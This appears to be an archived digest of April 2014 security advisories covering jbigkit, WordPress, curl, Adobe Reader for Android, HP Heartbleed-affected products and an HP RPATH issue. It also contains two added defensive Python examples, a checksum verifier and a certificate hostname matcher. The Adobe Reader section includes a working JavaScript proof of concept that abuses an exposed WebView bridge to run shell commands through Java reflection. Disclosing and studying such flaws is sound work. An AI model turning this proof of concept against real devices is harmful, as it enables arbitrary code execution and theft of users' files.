[ MDVSA-2014:077 ] jbigkit

2014-04-15 Thread security
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2014:077
 http://www.mandriva.com/en/support/security/
 ___

 Package : jbigkit
 Date: April 11, 2014
 Affected: Business Server 1.0, Enterprise Server 5.0
 ___

 Problem Description:

 A vulnerability has been discovered and corrected in jbigkit:
 
 Stack-based buffer overflow in the jbg_dec_in function in
 libjbig/jbig.c in JBIG-KIT before 2.1 allows remote attackers to
 cause a denial of service (application crash) and possibly execute
 arbitrary code via a crafted image file (CVE-2013-6369).
 
 The updated packages for mbs1 have been upgraded to the 2.1 version and
 the packages for mes5 has been patched to resolve this security flaw.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6369
 ___

 Updated Packages:

 Mandriva Enterprise Server 5:
 9d8c91789c60da3fecee77a49c5310d4  mes5/i586/jbigkit-1.6-3.1mdvmes5.2.i586.rpm
 d5a2dc7d87e77464ab16db94580a21bf  mes5/i586/libjbig0-1.6-3.1mdvmes5.2.i586.rpm
 e84cd3d872276cf4e07c6c5492be8da4  mes5/i586/libjbig-devel-1.6-3.1mdvmes5.2.i586.rpm
 0ec0e8efa6cb3ec0d677168fcde7fda6  mes5/SRPMS/jbigkit-1.6-3.1mdvmes5.2.src.rpm

 Mandriva Enterprise Server 5/X86_64:
 d58973e5576172f17a9ef08141112d4a  mes5/x86_64/jbigkit-1.6-3.1mdvmes5.2.x86_64.rpm
 e42a0cb60c9d42d279c7c5956c3b71be  mes5/x86_64/lib64jbig0-1.6-3.1mdvmes5.2.x86_64.rpm
 f2acf671b84073f40d4c315c0c86de2c  mes5/x86_64/lib64jbig-devel-1.6-3.1mdvmes5.2.x86_64.rpm
 0ec0e8efa6cb3ec0d677168fcde7fda6  mes5/SRPMS/jbigkit-1.6-3.1mdvmes5.2.src.rpm

 Mandriva Business Server 1/X86_64:
 30ffc8bc9b2f93e101a74bc6c369c251  mbs1/x86_64/jbigkit-2.1-1.mbs1.x86_64.rpm
 f929555b46784a872d5d724b6ec9ee36  mbs1/x86_64/lib64jbig1-2.1-1.mbs1.x86_64.rpm
 77f06c19a1d3b07b5c3378171fddb89c  mbs1/x86_64/lib64jbig-devel-2.1-1.mbs1.x86_64.rpm
 a322f2709a5c5263c1ff6364c580329c  mbs1/SRPMS/jbigkit-2.1-1.mbs1.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/en/support/security/advisories/

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iD8DBQFTSAunmqjQ0CJFipgRAq30AJ428RwdftMOnrJdYwzAipJcvi5yUQCeOeib
ga95S+kznGtC4ioov0jP0+s=
=N4Om
-----END PGP SIGNATURE-----
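A manual version of the checksum step the advisory says urpmi performs for you, as an added example that is not Mandriva's tooling: it parses the `md5sum  path` lines of an "Updated Packages" list and compares each against the file of that name under a download directory. The listing, directory and file contents inside `demo()` are constructed here; real use would feed in the signed advisory text and the directory the RPMs were fetched into. MD5 only catches corruption or a wrong download; the authenticity of the packages rests on the GPG signatures, which this script does not check.

```python
import hashlib
import os
import re
import tempfile

# One "md5hex  relative/path" line as printed in Mandriva advisories
# (leading whitespace and the two-space separator are tolerated).
CHECKSUM_LINE = re.compile(r"^\s*([0-9a-f]{32})\s+(\S+)\s*$")


def parse_checksum_list(text):
    """Return (md5, relative_path) tuples from an advisory's package list.

    Headings, separators and blank lines are ignored."""
    entries = []
    for line in text.splitlines():
        m = CHECKSUM_LINE.match(line)
        if m:
            entries.append((m.group(1), m.group(2)))
    return entries


def md5_of_file(path, chunk_size=1 << 16):
    """Stream a file through MD5 so large RPMs are not read into memory at once."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_checksums(text, base_dir):
    """Map each listed relative path to 'ok', 'mismatch' or 'missing'."""
    results = {}
    for expected, rel in parse_checksum_list(text):
        local = os.path.join(base_dir, rel)
        if not os.path.isfile(local):
            results[rel] = "missing"
        elif md5_of_file(local) == expected:
            results[rel] = "ok"
        else:
            results[rel] = "mismatch"
    return results


def demo():
    """Constructed scenario: one intact package, one altered package, one never downloaded."""
    good = b"constructed rpm payload A\n"
    original_b = b"constructed rpm payload B\n"
    # A listing in the advisory's layout, built from the constructed payloads above.
    listing = "\n".join([
        " Mandriva Enterprise Server 5:",
        " %s  mes5/i586/good-1.0.i586.rpm" % hashlib.md5(good).hexdigest(),
        " %s  mes5/i586/altered-1.0.i586.rpm" % hashlib.md5(original_b).hexdigest(),
        " %s  mes5/SRPMS/missing-1.0.src.rpm" % ("0" * 32),
    ])
    with tempfile.TemporaryDirectory() as base:
        os.makedirs(os.path.join(base, "mes5", "i586"))
        with open(os.path.join(base, "mes5", "i586", "good-1.0.i586.rpm"), "wb") as f:
            f.write(good)
        # The second file differs from what the advisory listed.
        with open(os.path.join(base, "mes5", "i586", "altered-1.0.i586.rpm"), "wb") as f:
            f.write(original_b + b"extra bytes\n")
        return verify_checksums(listing, base)


if __name__ == "__main__":
    for rel, status in sorted(demo().items()):
        print("%-8s %s" % (status, rel))
```

Anything other than `ok` for every entry means the download should be discarded and fetched again from the mirror before `urpmi` is pointed at it.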



[SECURITY] [DSA 2901-1] wordpress security update

2014-04-15 Thread Salvatore Bonaccorso
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- -
Debian Security Advisory DSA-2901-1   secur...@debian.org
http://www.debian.org/security/  Salvatore Bonaccorso
April 12, 2014 http://www.debian.org/security/faq
- -

Package: wordpress
CVE ID : CVE-2014-0165 CVE-2014-0166
Debian Bug : 744018

Several vulnerabilities were discovered in Wordpress, a web blogging
tool. The Common Vulnerabilities and Exposures project identifies the
following problems:

CVE-2014-0165

A user with a contributor role, using a specially crafted
request, can publish posts, which is reserved for users of the
next-higher role.

CVE-2014-0166

Jon Cave of the WordPress security team discovered that the
wp_validate_auth_cookie function in wp-includes/pluggable.php does
not properly determine the validity of authentication cookies,
allowing a remote attacker to obtain access via a forged cookie.

For the oldstable distribution (squeeze), these problems have been fixed
in version 3.6.1+dfsg-1~deb6u2.

For the stable distribution (wheezy), these problems have been fixed in
version 3.6.1+dfsg-1~deb7u2.

For the testing distribution (jessie), these problems have been fixed in
version 3.8.2+dfsg-1.

For the unstable distribution (sid), these problems have been fixed in
version 3.8.2+dfsg-1.

We recommend that you upgrade your wordpress packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
-----END PGP SIGNATURE-----



[SECURITY] [DSA 2902-1] curl security update

2014-04-15 Thread Salvatore Bonaccorso
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- -
Debian Security Advisory DSA-2902-1   secur...@debian.org
http://www.debian.org/security/  Salvatore Bonaccorso
April 13, 2014 http://www.debian.org/security/faq
- -

Package: curl
CVE ID : CVE-2014-0138 CVE-2014-0139
Debian Bug : 742728

Two vulnerabilities have been discovered in cURL, a URL transfer
library. The Common Vulnerabilities and Exposures project identifies the
following problems:

CVE-2014-0138

Steve Holme discovered that libcurl can in some circumstances re-use
the wrong connection when asked to do transfers using other
protocols than HTTP and FTP.

CVE-2014-0139

Richard Moore from Westpoint Ltd. reported that libcurl does not
behave in compliance with RFC 2828 under certain conditions and
incorrectly validates wildcard SSL certificates containing literal
IP addresses.

For the oldstable distribution (squeeze), these problems have been fixed in
version 7.21.0-2.1+squeeze8.

For the stable distribution (wheezy), these problems have been fixed in
version 7.26.0-1+wheezy9.

For the testing distribution (jessie), these problems have been fixed in
version 7.36.0-1.

For the unstable distribution (sid), these problems have been fixed in
version 7.36.0-1.

We recommend that you upgrade your curl packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
-----END PGP SIGNATURE-----
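As an added example that is not curl's code, here is the certificate name-matching rule that CVE-2014-0139 describes libcurl getting wrong, written in Python: a `*` in a certificate name may only stand in for one whole leftmost DNS label, needs at least two further labels so that `*.com` never matches, and must never match a host that was given as an IP address literal (those only match an exact address entry). The function names and test hostnames are mine; the matcher is deliberately stricter than RFC 6125 in refusing partial-label wildcards such as `w*.example.com`.

```python
import ipaddress


def is_ip_literal(host):
    """True for IPv4/IPv6 literals (a bracketed IPv6 form is accepted too)."""
    try:
        ipaddress.ip_address(host.strip("[]"))
        return True
    except ValueError:
        return False


def match_hostname(pattern, host):
    """Return True if certificate name `pattern` matches `host`.

    Rules applied:
      - comparison is case-insensitive and ignores a trailing dot
      - an exact match always wins, including for IP address entries
      - a wildcard must be the entire leftmost label and the only wildcard
      - the pattern must have at least three labels (no '*.com')
      - the host must have the same number of labels (no multi-label match)
      - an IP literal host never matches a wildcard, which is the case
        CVE-2014-0139 describes
    """
    pattern = pattern.lower().rstrip(".")
    host = host.lower().rstrip(".")
    if pattern == host:
        return True
    if "*" not in pattern:
        return False
    if is_ip_literal(host):
        return False
    p_labels = pattern.split(".")
    h_labels = host.split(".")
    if p_labels[0] != "*" or any("*" in label for label in p_labels[1:]):
        return False
    if len(p_labels) < 3 or len(h_labels) != len(p_labels):
        return False
    if not h_labels[0]:
        return False
    return p_labels[1:] == h_labels[1:]


def host_matches_any(host, names):
    """True if `host` matches at least one of the certificate's names (SAN list)."""
    return any(match_hostname(name, host) for name in names)


if __name__ == "__main__":
    # Constructed checks; the last one is the CVE-2014-0139 shape.
    checks = [
        ("*.example.com", "www.example.com"),
        ("*.example.com", "a.b.example.com"),
        ("*.com", "example.com"),
        ("192.168.1.1", "192.168.1.1"),
        ("*.168.1.1", "192.168.1.1"),
    ]
    for pat, h in checks:
        print("%-16s %-16s %s" % (pat, h, match_hostname(pat, h)))
```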



Adobe Reader for Android exposes insecure Javascript interfaces

2014-04-15 Thread Securify B.V.


Adobe Reader for Android exposes insecure Javascript interfaces

Yorick Koster, April 2014


Abstract

Adobe Reader for Android [2] exposes several insecure Javascript
interfaces. This issue can be exploited by opening a malicious PDF in
Adobe Reader. Exploiting this issue allows for the execution of
arbitrary Java code, which can result in a compromise of the documents
stored in Reader and files stored on SD card.


Tested versions

This issue was successfully verified on Adobe Reader for Android
version 11.1.3.


Fix

Adobe released version 11.2.0 of Adobe Reader that adds
@JavascriptInterface [3] annotations to public methods that should be
exposed in the Javascript interfaces. In addition, the app now targets
API Level 17 and contains a static method
(shouldInitializeJavaScript()) that is used to check the device's
Android version.

http://www.securify.nl/advisory/SFY20140401/reader_11.2.0_release_notes.png
Figure 1: Adobe Reader for Android 11.2.0 release notes


Introduction

Adobe Reader for Android allows users to work with PDF documents on an
Android tablet or phone. According to Google Play, the app is installed
on 100 million to 500 million devices.

The following classes expose one or more Javascript interfaces:

- ARJavaScript
- ARCloudPrintActivity
- ARCreatePDFWebView

The app targets API Level 10, which renders the exposed Javascript
interfaces vulnerable to code execution - provided that an attacker
manages to run malicious Javascript code within Adobe Reader.


PDF Javascript APIs

It appears that Adobe Reader for Mobile supports [4] a subset of the
Javascript for Acrobat APIs. For some reason the exposed Javascript
objects are prefixed with an underscore character.

public class ARJavaScript
{
  [...]

  public ARJavaScript(ARViewerActivity paramARViewerActivity)
  {
    [...]
    this.mWebView.addJavascriptInterface(new ARJavaScriptInterface(this), "_adobereader");
    this.mWebView.addJavascriptInterface(new ARJavaScriptApp(this.mContext), "_app");
    this.mWebView.addJavascriptInterface(new ARJavaScriptDoc(), "_doc");
    this.mWebView.addJavascriptInterface(new ARJavaScriptEScriptString(this.mContext), "_escriptString");
    this.mWebView.addJavascriptInterface(new ARJavaScriptEvent(), "_event");
    this.mWebView.addJavascriptInterface(new ARJavaScriptField(), "_field");
    this.mWebView.setWebViewClient(new ARJavaScript.1(this));
    this.mWebView.loadUrl("file:///android_asset/javascript/index.html");
  }

An attacker can create a specially crafted PDF file containing
Javascript that runs when the target user views (or interacts with)
this PDF file. Using any of the Javascript objects listed above
provides the attacker access to the public Reflection APIs inherited
from Object. These APIs can be abused to run arbitrary Java code.


Proof of concept

The following proof of concept [5] will create a text file in the app
sandbox.

function execute(bridge, cmd) {
  return bridge.getClass().forName('java.lang.Runtime')
    .getMethod('getRuntime', null).invoke(null, null).exec(cmd);
}

if (window._app) {
  try {
    var path = '/data/data/com.adobe.reader/mobilereader.poc.txt';
    execute(window._app, ['/system/bin/sh', '-c', 'echo \"Lorem ipsum\" > ' + path]);
    window._app.alert(path + ' created', 3);
  } catch (e) {
    window._app.alert(e, 0);
  }
}

References

[1] http://www.securify.nl/advisory/SFY20140401/adobe_reader_for_android_exposes_insecure_javascript_interfaces.html
[2] https://play.google.com/store/apps/details?id=com.adobe.reader
[3] http://developer.android.com/reference/android/webkit/JavascriptInterface.html
[4] http://www.adobe.com/devnet-docs/acrobatetk/tools/Mobile/js.html#supported-javascript-apis
[5] http://www.securify.nl/advisory/SFY20140401/mobilereader.poc.pdf


[security bulletin] HPSBMU02995 rev.2 - HP Software HP Service Manager, Asset Manager, UCMDB Browser, UCMDB Configuration Manager, Executive Scorecard, Server Automation, Diagnostics, LoadRunner, and

2014-04-15 Thread security-alert
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04236102

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04236102
Version: 2

HPSBMU02995 rev.2 - HP Software HP Service Manager, Asset Manager, UCMDB
Browser, UCMDB Configuration Manager, Executive Scorecard, Server Automation,
Diagnostics, LoadRunner, and Performance Center, running OpenSSL, Remote
Disclosure of Information

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2014-04-11
Last Updated: 2014-04-13

Potential Security Impact: Remote disclosure of information

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
The Heartbleed vulnerability was detected in specific OpenSSL versions.
OpenSSL is a 3rd party product that is embedded in some HP Software
products. This bulletin's objective is to notify HP Software customers about
products affected by the Heartbleed vulnerability.

Note: The Heartbleed vulnerability (CVE-2014-0160) is a vulnerability found
in the OpenSSL cryptographic software library product. This weakness
potentially allows disclosure of information protected, under normal
conditions, by the SSL/TLS protocol. The impacted products that appear in the
list below are vulnerable due to embedding OpenSSL standard release software.

References: CVE-2014-0160 (SSRT101499)

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

HP Product                      Impacted HP Product Versions         Notes
HP Service Manager              v9.32, v9.33
HP Asset Manager                v9.40, v9.40 CSC
HP UCMDB Browser                v1.x, v2.x, v3.1                     APR enabled on Tomcat includes an affected OpenSSL version
HP UCMDB Configuration Manager  v9.1x, v9.2x, v9.3x, v10.01, v10.10
HP CIT (ConnectIT)              v9.52, v9.53
HP Executive Scorecard          v9.40, v9.41
HP Server Automation            v10.00, v10.01
HP Diagnostics                  v9.23, v9.23 IP1
HP LoadRunner                   v11.52, v12.0                        Controller/load generator communication channel
HP Performance Center           v11.52, v12.0                        Controller/load generator communication channel

Impacted Versions table

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2014-0160(AV:N/AC:L/Au:N/C:P/I:N/A:N)   5.0
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP Software is working to address this vulnerability for all affected product
versions. HP Software will release product specific security bulletins for
each impacted product. Each bulletin will include a patch and/or mitigation
guideline. HP will update this bulletin with references to security bulletins
for each product in the impacted versions table.

Note: OpenSSL is an external product embedded in HP products.

Bulletin Applicability:

This bulletin applies to each OpenSSL component that is embedded within the
HP products listed in the security bulletin. The bulletin does not apply to
any other 3rd party application (e.g. operating system, web server, or
application server) that may be required to be installed by the customer
according to instructions in the product install guide.

To learn more about HP Software Incident Response, please visit
http://www8.hp.com/us/en/software-solutions/enterprise-software-security-center/response-center.html

Software updates are available from HP Software Support Online at
http://support.openview.hp.com/downloads.jsp

HISTORY
Version:1 (rev.1) - 11 April 2014 Initial release
Version:2 (rev.2) - 13 April 2014 Added HP UCMDB Configuration Manager as
impacted, updated HP UCMDB Browser impacted versions

Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel.  For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop 

[security bulletin] HPSBMU02994 rev.1 - HP BladeSystem c-Class Onboard Administrator (OA) running OpenSSL, Remote Disclosure of Information

2014-04-15 Thread security-alert
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04236062

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04236062
Version: 1

HPSBMU02994 rev.1 - HP BladeSystem c-Class Onboard Administrator (OA) running
OpenSSL, Remote Disclosure of Information

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2014-04-13
Last Updated: 2014-04-13

Potential Security Impact: Remote disclosure of information

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified in HP BladeSystem
c-Class Onboard Administrator (OA) running OpenSSL. This is the OpenSSL
vulnerability known as Heartbleed which could be exploited remotely
resulting in disclosure of information.

References: CVE-2014-0160, SSRT101500

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP BladeSystem c-Class Onboard Administrator (OA) v4.11 and 4.20

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2014-0160(AV:N/AC:L/Au:N/C:P/I:N/A:N)   5.0
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP is actively working to address this vulnerability for the impacted
versions of HP Onboard Administrator (OA). This bulletin will be revised when
the software updates are released.

Notes

Customers also have the option to downgrade OA firmware to any version prior
to OA v4.11 if that meets the requisite Hardware/feature support for the
enclosure configuration.
No action is required unless the OA is running the firmware versions
explicitly listed as vulnerable.

HISTORY
Version:1 (rev.1) - 13 April 2014 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel.  For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2014 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided as is
without warranty of any kind. To the extent permitted by law, neither HP nor
its affiliates, subcontractors or suppliers will be liable for
incidental, special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.19 (GNU/Linux)

iEYEARECAAYFAlNK/UsACgkQ4B86/C0qfVmEFACggs/Q1GaEsxwM9Vq17prvnMA9
zwsAn08KV2HUERq6QUThuGZ4USDSSh9S
=ItbO
-----END PGP SIGNATURE-----


[security bulletin] HPSBMU02998 rev.1 - HP System Management Homepage (SMH) running OpenSSL on Linux and Windows, Remote Disclosure of Information

2014-04-15 Thread security-alert
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04239372

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04239372
Version: 1

HPSBMU02998 rev.1 - HP System Management Homepage (SMH) running OpenSSL on
Linux and Windows, Remote Disclosure of Information

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2014-04-13
Last Updated: 2014-04-13

Potential Security Impact: Remote disclosure of information

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP System
Management Homepage (SMH) running on Linux and Windows. This is the OpenSSL
vulnerability known as Heartbleed which could be exploited remotely
resulting in disclosure of information.

References: CVE-2014-0160, SSRT101501

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP System Management Homepage (SMH) v7.1.2, v7.2, v7.2.1, v7.2.2, v7.3,
v7.3.1 for Linux and Windows

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2014-0160(AV:N/AC:L/Au:N/C:P/I:N/A:N)   5.0
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP is actively working to address this vulnerability for the impacted
versions of HP System Management Homepage (SMH). This bulletin will be
revised when the software updates are released.

Information and downloads for HP SMH can be found at the following location:

http://h18013.www1.hp.com/products/servers/management/agents/index.html

HISTORY
Version:1 (rev.1) - 13 April 2014 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel.  For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2014 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided as is
without warranty of any kind. To the extent permitted by law, neither HP nor
its affiliates, subcontractors or suppliers will be liable for
incidental, special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.19 (GNU/Linux)

iEYEARECAAYFAlNK/UsACgkQ4B86/C0qfVnUpACgs06y+OxukBiWTHsJUzFVtUs8
aeYAn2YETGkjLUrH6Js44b/Lgl4J2nry
=3CzH
-----END PGP SIGNATURE-----


[security bulletin] HPSBMU02997 rev.1 - HP Smart Update Manager (SUM) running OpenSSL, Remote Disclosure of Information

2014-04-15 Thread security-alert
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04239375

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04239375
Version: 1

HPSBMU02997 rev.1 - HP Smart Update Manager (SUM) running OpenSSL, Remote
Disclosure of Information

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2014-04-13
Last Updated: 2014-04-13

Potential Security Impact: Remote disclosure of information

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP Smart Update
Manager (SUM) running OpenSSL. This is the OpenSSL vulnerability known as
Heartbleed which could be exploited remotely resulting in disclosure of
information.

References: CVE-2014-0160, SSRT101503

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Smart Update Manager (SUM) 6.0.0 through 6.3.0

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2014-0160(AV:N/AC:L/Au:N/C:P/I:N/A:N)   5.0
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP is actively working to address this vulnerability for the impacted
versions of HP Smart Update Manager (SUM). This bulletin will be revised when
the software updates are released.

Until the software updates are available, HP recommends limiting HP SUM usage
to a secure and isolated private management network.

HISTORY
Version:1 (rev.1) - 13 April 2014 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel.  For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2014 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided as is
without warranty of any kind. To the extent permitted by law, neither HP nor
its affiliates, subcontractors or suppliers will be liable for
incidental, special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.19 (GNU/Linux)

iEYEARECAAYFAlNK/UsACgkQ4B86/C0qfVnCEgCgs9NE3ajD5WkXefc30WZhR/JQ
gwkAoNoHbkxpxzqSry1ZLk2OkJIc3Tnk
=jhjw
-----END PGP SIGNATURE-----


CVE-2013-6216 - SetUID/SetGID Programs Allow Privilege Escalation Via Insecure RPATH in multiple HP products on Linux

2014-04-15 Thread Portcullis Advisories
Vulnerability title: SetUID/SetGID Programs Allow Privilege Escalation
Via Insecure RPATH in HP Array Configuration Utility, HP Array
Diagnostics Utility, HP ProLiant Array Diagnostics and SmartSSD Wear
Gauge Utility Running on Linux
CVE: CVE-2013-6216
Vendor: HP
Product: HP Array Configuration Utility, HP Array Diagnostics Utility,
HP ProLiant Array Diagnostics and SmartSSD Wear Gauge Utility Running on
Linux
Affected version: 9.40
Fixed version: N/A
Reported by: Tim Brown

Details:

It has been identified that binaries that are executed with elevated
privileges (SetGID and SetUID programs) have been compiled in a manner
that means they search for libraries in insecure locations.

An attacker could place a malicious library in one of the affected
directories, which would then be loaded when the affected program is
run, leading to privilege escalation in instances where the program runs
with privileges that the attacker does not have.


Further details at:
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2013-6216/


Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights
reserved worldwide. Permission is hereby granted for the electronic
redistribution of this information. It is not to be edited or altered in
any way without the express written consent of Portcullis Computer
Security Limited.

Disclaimer:
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO warranties, implied or otherwise, with regard to this information
or its use. Any use of this information is at the user's risk. In no
event shall the author/distributor (Portcullis Computer Security
Limited) be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.
